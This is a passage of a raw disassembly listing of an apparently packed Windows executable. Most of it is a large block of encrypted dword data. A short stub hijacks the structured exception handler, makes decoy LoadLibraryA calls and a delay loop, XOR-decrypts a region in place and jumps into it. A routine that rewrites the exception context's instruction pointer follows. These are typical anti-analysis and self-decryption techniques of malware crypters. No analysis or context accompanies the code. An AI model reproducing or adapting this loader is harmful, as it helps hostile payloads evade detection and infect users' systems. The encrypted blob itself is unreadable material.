177EFADh, 0EEC56F83h dd 0AA38C27Ah, 8D659A24h, 0DBE2CA4Ch, 36F6724Bh, 0F9D5C906h dd 0D0485F01h, 0BE40D25Ch, 0F031DF34h, 641801B4h, 70E8C541h dd 2D0354BCh, 0E36BA054h, 0D6715A0Ah, 9EAF1F4Eh, 9AC8922Ah dd 0C94560F7h, 48B874F4h, 0A315ED0Fh, 0DE68C444h, 0D040CA44h dd 0FAD82394h, 6E34FA07h, 657F7D6h, 0BDC62A82h, 4DFDB483h dd 6D50EC5Ch, 61D472D4h, 0D3857DEBh, 4ED854D4h, 52F03AC4h dd 0FCD8A295h, 0E05877F1h, 2BCF684Ch, 8626A281h, 5EE852FCh dd 34B5CC64h, 411526A8h, 7BD5707Ah, 3748E464h, 0A01F1AB9h dd 0EE53E40Ch, 41A55F18h, 5128320Ch, 1E2A4A6Bh, 31A71E15h dd 9E953FB3h, 3E08922Ah, 0EE866AF4h, 2CCD73AAh, 0ADF63310h dd 5B62EACCh, 0B676F2CBh, 241B42ECh, 990C2EECh, 0C940E223h dd 20988F31h, 0EEF8028Ch, 7652AF64h, 38D38BAh, 1000BC2Ch dd 4B24E247h, 26003DB1h, 0BE775D1Ch, 2A4B02DEh, 2BCF3DB3h dd 8626A281h, 5EE972FCh, 767041A1h, 3605A7A6h, 0DDAFAB2h dd 3DF0B453h, 0B85A0F4h, 8F8B434h, 0ECD1EA4Fh, 260DB74Bh dd 0F6800AA2h, 0E12DE26Eh, 9E953FB3h, 7E08922Ah, 4C956AF0h dd 0ABB2827Ch, 6A6223Bh, 0E6CC57F6h, 5681CA62h, 0E8A0C43Ch dd 6640D185h, 7E785A37h, 2E3FAFBEh, 19D202BAh, 0F0687FE1h dd 9628B23Ch, 1010FF14h, 4430E154h, 1088A461h, 4E23749Ch dd 66680175h, 30BDC804h, 2C10AC1Ch, 664DF70Bh, 36C04AE2h dd 7B2922BCh, 5E16DFF1h, 1B422ADFh, 961692AAh, 0AECB296Ah dd 0F66D734Eh, 0E9A80483h, 0C0B8AF11h, 0EE58E26Ch, 172FCF44h dd 1813796Bh, 5CF8634Ch, 1880DC69h, 574DAA4h, 0E6F65776h dd 1D26CA62h, 0B1A81F05h, 0A77A7A32h, 178F756h, 0BDC62A82h dd 6B7A5A3Ch, 0C666E2F9h, 3BAD4596h, 7500BC2Ch, 3AD962ECh dd 8335CDE6h, 0FE8824A4h, 0A364EA74h, 0BBD355Ah, 8610AC1Ch dd 2BEB72FCh, 0CC44A2D1h, 0A570DD53h, 118F057Eh, 887077D9h dd 9620AA34h, 0DEFBF604h, 0C327F02Dh, 1E9E0A19h, 76800A94h dd 0C9E8C218h, 9EAD3F6Eh, 9EC9922Ah, 5E6967EEh, 8BBA42E8h dd 6A62239h, 5E6B16BCh, 6EBCE90h, 367E084Dh, 0C3FA9AFBh dd 3EFE6A41h, 935781D2h, 0EE4E3A29h, 0C650DA44h, 1BDFE148h dd 7636B2B1h, 6ED862ECh, 0E14737B0h, 0FE88129Fh, 46D0EF00h dd 25CB29E6h, 2E9D11E3h, 75E844C3h, 0CA81C315h, 8B927A1Ch dd 0E646C219h, 1BCD25F6h, 96209C0Ch, 1AF8C20Ch, 16683CE8h dd 832D387Fh, 1D803CACh, 31E08466h, 3B95B0A4h, 1808A424h dd 0F3659D5Fh, 2DB874F4h, 72911AA4h, 7BED050Fh, 0B640FC6Ch dd 0FA38A22Ch, 65378D09h, 4AC852DCh, 0BC309AB1h, 21F3F167h dd 0F9905FEFh, 5603B20Ah, 45FCC29Dh, 0EB5D9525h, 26B00CFCh dd 8B88929Ch, 4BE5677Ah, 2438F474h, 7F90DA2Ch, 0D31001FFh dd 128487D0h, 0EE5922BCh, 4DFB4A8Ch, 62ED4BFh, 3D466A05h dd 0EE773A6Ah, 46D0E28Ch, 784930BCh, 732B523Fh, 0A85E97A5h dd 0C0F08BFCh, 0D4CB22B7h, 6E50EF79h, 0AB4F42FAh, 6A62201h dd 0CE68F27Ch, 9D17CC21h, 97F3FAD4h, 4DD8298Fh, 0B5187924h dd 209FE239h, 46ED038Ch, 0C750EC5Bh, 0BA6C3905h, 11BD0310h dd 0C5D854FCh, 108F9679h, 560D399Ch, 2160DC4Bh, 980067C9h dd 8610DA24h, 0A9EA06FCh, 3202E10Ch, 8DCF74ACh, 0D04F1A39h dd 3A47D25Ch, 9620ABEDh, 6EF88FE4h, 149511E4h, 2DE477F2h dd 0BAC424A6h, 5BA7E220h, 0A60681D6h, 41FC1795h, 0DDB36AC2h dd 0F6BB7E94h, 8DB8695Bh, 3E80C63Fh, 3DBF35A1h, 0B82776B9h dd 24F32104h, 0C64DDBD0h, 15A01C8Bh, 6BF10ACEh, 0C666E598h dd 6100C1B7h, 76000AA7h, 0BB618AECh, 9B3BC53Bh, 0FEBE2D48h dd 23CD0222h, 3BB33DB3h, 8626A5F0h, 5DE03877h, 0F8EB469Eh dd 19DCB2Fh, 0E6719A0Ch, 0E4CCDD5Ch, 9520AA35h, 58C75AB9h dd 0DE6559E4h, 0B2A80483h, 738FE2A8h, 0CE58E2CEh, 8D34FCC9h dd 48370A99h, 6E669F4h, 0D14D2824h, 0D22D995Bh, 0DE68C443h dd 0F17BC121h, 959BAD20h, 8DF07A05h, 0EA5D6BD0h, 19A01C8Bh dd 0EE790F09h, 5ED5D964h, 0F8288403h, 53FFB295h, 4E24E7E3h dd 663B3AC4h, 0CACB399Eh, 234D0224h, 13013DB3h, 8626A5F0h dd 5E0CF7F3h, 0B3C34AD4h, 0EAE1D74h, 0D9E87F87h, 0BEC3D26Ah dd 992CED1Fh, 6EF84F8Eh, 4E9761E4h, 1E6CB1B3h, 36030A94h dd 0DA1FE16Eh, 99A83F47h, 2E5A922Ah, 6914DF0Bh, 0BB4742FAh dd 6A621F6h, 0D1A87726h, 0B6407DD1h, 8E844B2Ch, 99CC7A04h dd 3E5CD7D3h, 28202AB4h, 65FD0D99h, 4D50DA64h, 0DD03B37Ah dd 0CAE8DA20h, 77279D18h, 108FEE79h, 0FDFF679Ch, 0E05F32F1h dd 36BDC14Ch, 0F10AC1Bh, 68A87279h, 0DC0C1D4h, 38A7DA29h dd 0DD788884h, 88772ED9h, 0AB49D834h, 1EF8820Ch, 59386D96h dd 93A832BCh, 370BF6DAh, 8C5BE047h, 0A6B58154h, 0B08A45Ch dd 4624E9F8h, 6A377333h, 0EDF10680h, 5BE73167h, 0B676F5ECh dd 16AD294Ch, 8EF04C3Bh, 0C137A786h, 16A083D5h, 0E00D828Ch dd 0B45C9D4Fh, 966F8935h, 893C081Bh, 41919D13h, 0D94E8841h dd 0DAB49963h, 0FEC54DF5h, 51C7C24Ch, 0C4FBE5DBh, 3ECC387Dh dd 78204AD4h, 213E29Fh, 6F57DA0h, 3748E463h, 0A01F76B1h dd 0C7410F0Ch, 45D05ACCh, 2897AA39h, 53256C94h, 0CD9EC922h dd 0E41BAE06h, 854E5410h, 461AD1Ch, 2BB842CCh, 8F901AA4h dd 80370E3Ah, 23BF9D97h, 8E2E99B2h, 69EF92C5h, 3EC94859h dd 7CF47AB4h, 118768A4h, 0F06B24F1h, 0C1E8373Ch, 7705021Bh dd 0E3062ECh, 0CE4FC521h, 0FE88128Dh, 90148F27h, 0FD5DAE25h dd 0F465F941h, 1F910695h, 5A75B5D4h, 0F1981493h, 0D04BA811h dd 0CACD5B5Ch, 7E209C0Bh, 6EF88215h, 27843FB7h, 69E757D7h dd 85F26FFAh, 9E288B04h, 0CF46D336h, 1B6FF770h, 47083DF4h dd 0C647BD25h, 6901AB7h, 0BB3A972Fh, 0C42FBE27h, 0E76AF249h dd 39C1372h, 69C837BBh, 0E948D95Ch, 0EE6AEA73h, 0A303DA64h dd 0F54BD37Eh, 450FA61h, 22B11485h, 26D55DA1h, 165EFACBh dd 0CE88158Bh, 0FD38C24Ch, 0E778D941h, 108D1592h, 50A93EBBh dd 67EA72D5h, 831C93F2h, 0E948B73Bh, 69C819DCh, 0E3ACD2F3h dd 70EAEA61h, 4ECC58BCh, 9D70BFEh, 0F864E8F9h, 820C3344h dd 454E07E3h, 96CA6AC2h, 10D0FF41h, 56C01A92h, 6EDD0D2Ch dd 0DE40FC6Eh, 8E1CA22Dh, 31F11050h, 1BCC723h, 7CF42A82h dd 7B875588h, 0C666E510h, 613C76BFh, 403FE6A1h, 0CC4D9DECh dd 79B00CFFh, 963D9F5Fh dd 8060DC4Ah, 95BE57B3h, 7E939A12h, 0E56C7D03h, 0BFC04AD4h dd 38A75A29h, 0B0709084h, 858A47A3h, 56A5AA02h, 6E5C0603h dd 86FB5AE4h, 1DC262ECh, 9E8160C4h, 0E58E26Ch, 0C4A54512h dd 0FD08A427h, 0D2EF950Ch, 2EB84724h, 39EC9F2Dh, 53E5F24Ah dd 0B676F5D4h, 0B19037A1h, 34A17A32h, 0C19852B6h, 209BA421h dd 1180818Ch, 0C3E65E6Bh, 9E42B23Ch, 497C3FEBh, 0DB2762DAh dd 2686014Eh, 0F177EA1Fh, 0D66575F0h, 3EBD4B4Ch, 0B510AC1Bh dd 0F2B7135h, 32AA1B84h, 722DDDFDh, 1970CCBBh, 8873B4C9h dd 99E02F34h, 6EFDF988h, 0CF1969E4h, 2897A639h, 0A7D15B94h dd 0C158FD04h, 33CFEA44h, 7E3EA9B2h, 0D2EFAA71h, 2EB847F8h dd 39089F2Dh, 66ABF24Ah, 0B640BA5Ch, 7920E9A7h, 50C8DF81h dd 3EC852DCh, 15A65FA4h, 0D8686509h, 0C582E964h, 69D945FDh dd 0D28503F5h, 0F6D854D3h, 26B0126Bh, 0FDB45917h, 0E0708DF1h dd 0ADEAF14Ch, 71E16DE5h, 0C26DFB1Dh, 0F5C07CEBh, 8D395A3h dd 6B45197Dh, 947CA0Fh, 4623BE77h, 4639E945h, 7C518AE7h dd 70C145E3h, 759D7E6Dh, 0BC59EE16h, 9A7B31A4h, 7D1CD097h dd 126D7AB6h, 0F74FBD84h, 83ABDB87h, 0DE5ECDECh, 92144197h dd 1D8913Ch, 66F0C286h, 0F14391DCh, 0AB2D215Fh, 0EE4E3CE4h dd 0F58F5198h, 0FF141EF5h, 0C3C8C66h, 6EF4609Bh, 52EC066Eh dd 8AA62E70h, 0A360D6A9h, 25F121A4h, 0DE55A725h, 559C72B9h dd 648319E9h, 3D1D2DACh, 6D8F057Bh, 0F71FEF5Fh, 122FE97Ah dd 91077D2Ah, 13930DD9h, 52C3DF2h, 0CB7FF56Bh, 0FC6BA13Bh dd 59203E4Bh, 2E356DE3h, 59AF3EA7h, 0D1474748h, 0EE4B295Bh dd 21970C51h, 4CA8DA21h, 66E75DD0h, 990F8425h, 0C024D6D3h dd 0C493D54Bh, 0EE781464h, 39333264h, 9EC04DC3h, 2B008A14h dd 7D8B8F6Dh, 0FD593AF2h, 9A88129Fh, 63EBD88Bh, 0AE0EFDD4h dd 0E0321340h, 4A54C7Dh, 3504CFDBh, 501322ACh, 80AEF9B8h dd 0FB18E9DDh, 95942F3Bh, 2D0F820Ch, 46F05AF2h, 0B92D3DBCh dd 800A97h, 0C15ABE2Fh, 0A63327C0h, 764B191Ch, 0F640CAC9h dd 0A13C4D6Ch, 3B901AA7h, 0FE48D25Ch, 0B5C44E5Bh, 37F0A22Ch dd 690F85FAh, 3ECB2B5Eh, 0CA05A9B4h, 0EE7834B3h, 4D5898EFh dd 5F03A276h, 0B6338E67h, 86DB6707h, 0AFA0704Dh, 0C8B7B219h dd 0DA2AE974h, 0AF38C2F4h, 16F8CB24h, 6E178D1Bh, 0F8E941h dd 3EB893ACh, 0D0485E31h, 4068B85Ch, 8258F2FDh, 911FF4E4h dd 4902DF1Bh, 0FC7BF028h, 0CE259FA5h, 2BB3E25Ah, 9E953FB3h dd 7E08922Ah, 74946BF4h, 161DC73Bh, 6931A92h, 0D21DF27Ch dd 8EE56FD5h, 71E7A21Ah, 6C1B81FBh, 66DDF5Dh, 16A02A82h dd 0E8100A8Ch, 9F50DA64h, 9E28B454h, 5EE8D214h, 0C4279D0Bh dd 1088A741h, 0D40C949Ch, 0D656D2E9h, 96A547C4h, 66F29A12h dd 664DF70Bh, 36C84AE2h, 7ED22ACh, 0DEEF4704h, 0CA49D26Ah dd 33A55DF1h, 6EF8B434h, 32D85AE4h, 8315B2A7h, 0F3803CACh dd 73D85218h, 0A60682DAh, 0FEAFE619h, 60D8F549h, 0B0CC47CCh dd 3E359F53h, 0DE68F24Ah, 0BF344A54h, 0B6851FACh, 11F27A32h dd 0DE6DD155h, 16A01C8Bh, 118B0564h, 3B31329Bh, 0EEC04DC3h dd 0FD008A16h, 78E7FE71h, 862D39C4h, 168824A3h, 299F160Dh dd 0AC684643h, 339B9A24h, 5EDE4D64h, 35FC145Fh, 0F3E2CA72h dd 647F057Bh, 0BE48D066h, 0F604E0B5h, 0E518820Ch, 4586081Ah dd 64AB26C6h, 5305FD84h, 0CE58D454h, 0D320BA44h, 9AB51B08h dd 0DBE05CCBh, 1880F279h, 611D91A4h, 2D68C46Ch, 9AF99DF0h dd 318A226h, 50E07AB1h, 8F6DA1DCh, 0E5A2C9B4h, 4BFDF528h dd 0C650EC5Ch, 9138B23Ch, 76002490h, 66AB9DECh, 0D95E8C2Ch dd 2A1D9963h, 5360DC4Bh, 36BCCD9Eh, 0D109A24h, 68D7EA49h dd 268AC1D4h, 6EBC682Dh, 0CD90FA84h, 0BC3BDA16h, 0E4236307h dd 975B918h, 0CDD06CF4h, 28B85531h, 7DD67894h, 6BDBC650h dd 0A606AA23h, 19AF111Ch, 56E06AF4h, 2FB03847h, 0F19312EEh dd 5BE305FBh, 0B676F5F8h, 0B6BD27DBh, 66B07A32h, 3CBC52DCh dd 64A33243h, 67482B80h, 0F06F3AD1h, 0B65B393Ch, 0F3F7BA15h dd 4EEE5A49h, 26B03A84h, 0E67F10E8h, 2A290225h, 45613DB3h dd 0AE639928h, 0FE400D7h, 6964B982h, 0BE2DAFF5h, 6F70CCBCh dd 887736E1h, 0C9845934h, 0FCC98D52h, 4603DD69h, 8B9232BCh dd 0F6B63237h, 1C31E419h, 0B404EC3Ch, 96F8C294h, 0A91FB054h dd 22F2C996h, 0F18050A7h, 0E85057F9h, 0B640CA54h, 8B592F3Ch dd 0EB796971h, 3EFE6D3Ch, 6C7AFB7h, 49FB02BAh, 0C650DA03h dd 0B66B993Ch, 76520D9Dh, 0CB2F62ECh, 268606A4h, 0FE88129Dh dd 95A7ED00h, 0E986244h, 23956D84h, 5EE844C4h, 42404AD4h dd 747070ABh, 0BC8F0573h, 81A85FD7h, 93C3AA02h, 85D0C985h dd 9A5DD1E9h, 0FDA80483h, 7D83E196h, 4BAFCA27h, 0A60682E1h dd 7E08921Fh, 0D36B7E80h, 2E8E7D28h, 394097A7h, 5B6BF24Ah dd 0B676F598h, 0C493AA2Dh, 0FA75F114h, 7C864E3h, 15D322FEh dd 0EF704805h, 0A5D3CA26h, 1BA3B264h, 7636B5B0h, 4EF0D284h dd 2EF23BC4h, 0AECB13C5h, 0EEC37FFEh, 2BCFC27Ah, 8626A281h dd 4EE872FCh, 0BBC34CA0h, 0EAE32CBh, 6387FA32h, 0BE7EEAF9h dd 9622AA34h, 0A8069679h, 7E75DF13h, 1EA8328Ah, 0F0F50A90h dd 0F6FC57E6h, 23C7BA72h, 7E3EAAB9h, 56E02AF4h, 293249B9h dd 43AD8A6h, 359F10AAh, 8447405Dh, 581A08EEh, 0B4C38DE6h dd 5AEAD9B8h, 95F8283Bh, 0D8477E31h, 425FDA64h, 61D748E2h dd 49983FEBh, 0DB2762DAh, 26860116h, 0C11CA763h, 439FEA42h dd 0AE0EF90Ah, 0B99017A9h, 0CB6572CAh, 36F6755Ch, 0EF270FDh dd 0D90C4F7Bh, 2BB7D26Ah, 961691F2h, 518437F3h, 0D32F5AD2h dd 1E9E09FAh, 0C8E8BF19h, 7BA7E25Ah, 0A606853Ch, 0BC9D6D4Ah dd 0D5E05CCFh, 18873E69h, 0EE531AA4h, 0DE68F27Ch, 3741A009h dd 0B82F12C1h, 69002204h, 2BBCD71Dh, 0D6252A82h, 11B0814Fh dd 4391D594h, 9E1EA748h, 7610B7D7h, 52AD62C6h, 2CCBBA2h dd 8BF97E90h, 12888A67h, 0DBC73DB3h, 7CC47221h, 8C008D03h dd 573FB52Bh, 76B5DD82h, 5E62CED2h, 0BE48D279h, 69854254h dd 578D7DF3h, 76F41E6Fh, 20C08731h, 0A60B0AA2h, 0F4D98464h dd 8343B842h, 7E08FA4Ah, 926B6A0Bh, 7EEA42A6h, 3A828F5Bh dd 1AEBF24Ah, 0EA7E4B5Ch, 0FB449D13h, 6236F907h, 0C132D334h dd 0E9DFC24Bh, 2D19FD73h, 0C650AEDCh, 2699593Ch, 76008A3Bh dd 4ED87F04h, 2690F8C4h, 0FE882224h, 0D6700274h, 8AFAC24Ch dd 87952224h, 5D0072FCh, 0F4C04AD4h, 5A152280h, 0C8BDF6A0h dd 0C2482ADFh, 96C8CA2Dh, 0E5F8820Ch, 1BE07EB0h, 0F3292837h dd 0F6B63213h, 31B95884h, 0A2F2DBBBh, 7C09911Ch, 68E66DF1h dd 71E15FCDh, 9415FF79h, 90010011h ; --------------------------------------------------------------------------- push ebp mov ebp, esp call sub_3146C8C7 call sub_3146C970 mov ebp, 0 jmp loc_3146C920 ; =============== S U B R O U T I N E ======================================= sub_3146C8C7 proc near ; CODE XREF: UPX2:3146C8B3p push dword ptr fs:0 mov fs:0, esp xor dword ptr ds:loc_3146200D+1, ebp xor ecx, ecx push ecx push 1000h push 8 push 80h push ecx push ecx push ecx push 80000000h push 80000000h push ecx push ecx call ds:dword_3143808C ; LoadLibraryA xor edx, edx push edx push edx push 80000000h push 80000000h push edx push 2000h push edx push 80000000h call ds:dword_3143808C ; LoadLibraryA loc_3146C920: ; CODE XREF: UPX2:3146C8C2j sub eax, eax loc_3146C922: ; CODE XREF: sub_3146C8C7+61j dec al or al, al jz short loc_3146C92C jnz short loc_3146C922 jmp short near ptr byte_3146C993 ; --------------------------------------------------------------------------- loc_3146C92C: ; CODE XREF: sub_3146C8C7+5Fj call $+5 pop ecx sub ecx, 0FFFFFFB4h push ecx mov edx, 28B0h stc mov ebx, 7Dh loc_3146C944: ; CODE XREF: sub_3146C8C7+97j xchg al, [ecx] cld cld cld xor ax, bx xchg al, [ecx] cld cld cld add ecx, 1 add bx, 7Fh sub edx, 1 or edx, edx jnz short loc_3146C944 pop ecx mov ebx, [ebp-8] mov fs:0, ebx leave jmp ecx sub_3146C8C7 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_3146C970 proc near ; CODE XREF: UPX2:3146C8B8p arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_3146C970 endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 95h, 0FCh, 7Bh dd 737379FAh, 0EB7D89D2h, 6FF05E11h, 19h db 3 dup(0) byte_3146C993 db 0 ; CODE XREF: sub_3146C8C7+63j dd 195h dup(0) dd offset loc_3146A000 dd 1405h dup(0) UPX2 ends ; Section 4. (virtual address 00042000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00042000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 31472000h dd 80h dup(0) align 1000h _idata2 ends end start